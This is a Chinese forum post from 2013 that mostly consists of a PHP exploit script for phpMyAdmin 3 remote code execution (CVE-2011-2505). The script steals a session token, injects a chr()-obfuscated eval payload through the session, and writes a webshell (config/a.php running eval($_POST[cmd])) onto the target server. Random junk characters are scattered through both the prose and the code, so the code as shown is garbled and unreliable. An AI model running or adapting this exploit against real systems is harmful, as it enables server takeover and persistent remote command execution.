最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。1 M+ w$ f; E+ H( D5 }; S
9 c A S P9 m" k1 K8 P昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
$ X2 R W* P7 q& R! B0 {& e
7 l2 q) Z; z" {$ Q4 O4 Z首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:- K% {) ~- w& b4 R, u' u
一是session.auto_start = 1;& S: i# ` q( ^& q! k: c" _
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
! A6 ~& G/ {: ?4 S. q当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。5 Y+ _+ ^* U! q, X/ }: @
+ N# b0 B) }- m' E5 z! B8 d' D+ a
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。6 O' n8 `* p2 p: p) V9 J
1 o/ Y! r, Y/ ?' y7 ?# g于是写了这个php版本的exp,代码如下:
% @; _0 x3 ?; [3 l' T( Q: U! ^8 j
#!/usr/bin/php
$ X3 q$ U( [1 D6 E<?php) ?/ C: j4 ^$ y3 o0 }& r
print_r('
9 \/ i, j# ~' o4 @( ~2 ]+---------------------------------------------------------------------------++ `, P5 `1 j" `$ W$ l
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
& d/ D4 S2 ~, S) i% Jby oldjun(www.oldjun.com)
( W9 Q# i) k: Z5 h/ _: F W/ n" l& wwelcome to www.t00ls.net/ d; k% t" J# [7 ^2 S' O
mail: oldjun@gmail.com5 \# h% m5 z ?* a/ T& d! u
Assigned CVE id: CVE-2011-2505
3 ?7 ^: g% l* w+ @# y- h# b+---------------------------------------------------------------------------+
$ P' m8 G8 W. f- P');+ o5 Q3 L. s! P6 @) V8 x
2 E, L: z# G! r/**; V& r* d2 O! H4 R' y+ W5 D
* working when the directory:"config" exists and is writeable.
. p4 m+ T% b8 G, M6 K; l**/
4 o4 H+ _, O- l2 r) w9 T
5 B! I" M; \/ [8 Iif ($argc < 3) {
& c5 _# H4 T0 }0 i1 t print_r('% B/ F$ i8 d2 q, [+ B3 c }
+---------------------------------------------------------------------------+% a6 C( R3 h" l3 v$ K
Usage: php '.$argv[0].' host path
" w% {5 n u, D9 V" F7 N# O/ Zhost: target server (ip/hostname)" A5 ^. k. Z7 x5 E/ m! Q
path: path to pma33 Y# s( S' H) b. J% l, K% V6 b; ?
Example:) a8 g) b( D0 n9 C) G
php '.$argv[0].' localhost /pma/
7 M- D+ I/ n/ l+ A2 R+---------------------------------------------------------------------------+
+ ~" M: [6 T9 V7 }% [- ^');
% N- m4 A/ } P& P4 J exit;
" x8 j! \8 q* q _}4 \) P$ {/ x {" `5 x8 ~) {+ p
. v/ c3 }* S" R. T
$host = $argv[1];7 o( G& B: |5 s& b8 O0 y" j
$path = $argv[2];
) ^, G- T6 [8 q8 f7 j- S- X( s
2 K( o# i. S. A7 G: |/**1 l. M3 p+ o$ g5 U
* Try to determine if the directory:"config" exists
: F. a' D1 `4 t**/
9 o( t! Y j" w1 decho "[+] Try to determine if the directory:config exists....\n";
2 x! Z* |1 N. i$returnstr=php_request('config/');
/ X, ^2 g! j( Q! q- {7 Nif(strpos($returnstr,'404')){1 T" \8 v9 J+ A7 b$ e4 D6 s
exit("[-] Exploit Failed! The directory:config do not exists!\n");
; x! t! n4 r* Q* j( W4 w}0 i9 h/ O% Q% d0 `8 t! q% a! a
& u) H: I% ?) U ~/**3 `& Q0 T7 F6 B% V
* Try to get token and sessionid
$ _- o( G- L; g**/ [5 c1 o- H! o9 q! ~$ T# @
echo "[+] Try to get token and sessionid....\n";
2 p* ]# l L2 Y8 V8 Z- C8 b$result=php_request('index.php');
* {( h0 r* ?9 J2 P) npreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
' ^! _" O) D7 i: Z' Z% M! T$token=$resp[3];6 Q- v2 u; J% F" K! H9 X' s( A) A
$sessionid=$resp[1];& L0 Y! d2 E$ ~0 E; W
if($token && $sessionid){
* G/ h1 r$ i6 [4 y3 I echo "[+] token token\n";
* v7 z5 M& L- T7 v; `; R; ] echo "[+] Session IDsessionid\n";
7 B% X- P' J1 k" d% ^9 S9 s+ x}else{. X: J! V% i$ [/ c
exit("[-] Can't get token and Session ID,Exploit Failed!\n");9 i2 o0 o# w0 U; J
}
+ L1 n: B! ]* p/ l8 U( u5 b
' L" @1 g/ E: E3 b% k' L; M/ Y/**$ \/ N1 S( {5 F; }7 n
* Try to insert shell into session6 {% C: }( Y7 C' |
**/; u( O4 z9 X# y2 u5 ]
echo "[+] Try to insert shell into session....\n";' m2 K0 R) U' B j/ a3 S
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
) R) Q6 I9 X& R3 P9 L6 {! Q; s; z/ b. `& r, W {$ w
/**! x- c" r0 n& k! o# v% t1 h" k
* Try to create webshell" t/ I4 Z9 Q& h
**/2 x; K0 r2 F O0 Y3 Q. b: Q
echo "[+] Try to create webshell....\n";
$ o2 L+ ]+ |, U' P, bphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);9 k& ^/ i: k# b' K% k
/**$ s! ?+ B' t' {! f3 n0 K( i/ Q2 I
* Try to check if the webshell was created successfully `8 K' ?0 h8 I3 Q5 q8 C
**/
) Q# D; ]9 W6 T8 fecho "[+] Try to check if the webshell was created successfully....\n";$ ^! w4 f6 F/ e5 R- q
$content=php_request('config/config.inc.php');
! N I! G- T2 j" x; Dif(strpos($content,'t00ls')){1 u) B2 |! B1 P7 W; ?$ k
echo "[+] Congratulations! Expoilt successfully....\n"; a5 n7 j9 P8 N* O# a# U
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
5 p- `* c# n/ u0 j6 _}else{
! S$ x6 f/ \7 H5 b. W. h( w* y exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
$ }) j& L4 }) p/ R5 w5 H}
8 |7 M; f% |) C" J
8 A7 @. t8 W$ |/ }function php_request($url,$data='',$cookie=''){# v2 c, j2 M+ b5 c* D1 z J
global $host, $path;
* y1 }0 P# K- R7 \3 v7 c6 h3 N% a, |/ O * R b' }) G' @& d8 f6 t
$method=$data?'POST':'GET';& `* `0 Z6 z% V- X2 r2 y; ~7 Q& z
0 G0 [. o E# {: A& Y $packet = $method." ".$path.$url." HTTP/1.1\r\n";7 e5 M7 l' O3 P4 G9 G4 M/ \3 A8 \
$packet .= "Accept: */*\r\n";! S& B* m+ e, v4 V7 x: h
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";6 p/ O. o5 `" r3 q
$packet .= "Host: $host\r\n";, k" E2 O. M: k) v
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";% Q& ?6 S2 b$ d* j8 w4 p: S: v
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";0 N v9 a. K! t
$packet .= $cookie?"Cookie: $cookie\r\n":"";
& q) i( Z7 j9 y5 W; Y $packet .= "Connection: Close\r\n\r\n";
0 S, j- Y. D P" Y: p% f) C $packet .= $data?$data:"";3 }& G5 U$ g+ S) U/ l
9 w$ e. V q! `: P0 {& a
$fp = fsockopen(gethostbyname($host), 80);' M8 Z; v# j* T8 r; c3 S$ K$ e& F' R
if (!$fp) {" C3 R3 F7 I! C/ a+ ]9 ^6 I7 t
echo 'No response from '.$host; die;
0 N& s& r: e9 x- \2 B- p% L }
) N0 r- J! D; Y* `% ]) {; j7 E fputs($fp, $packet);& q3 k6 g2 H L+ J5 Z, ?' N" O
' |- j6 ?3 T- p- J
$resp = '';
9 D8 ?' G2 D: ~& X8 l% D7 G' K
* s0 A4 @' d6 P- ]3 P4 s while ($fp && !feof($fp))9 \4 V- }8 o8 _: x0 D
$resp .= fread($fp, 1024);- b# Y' l5 h, L# |/ ?) U
, j. Q+ C' \" a( W! U6 B return $resp;- H( y2 N/ h; z" {9 n) o9 ]6 I
}
4 J3 Z: h4 B+ E* N' O( h# x
2 o: E1 P$ Z' e! X& l?> " E$ J5 [& g2 ]. p- ~/ a }
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对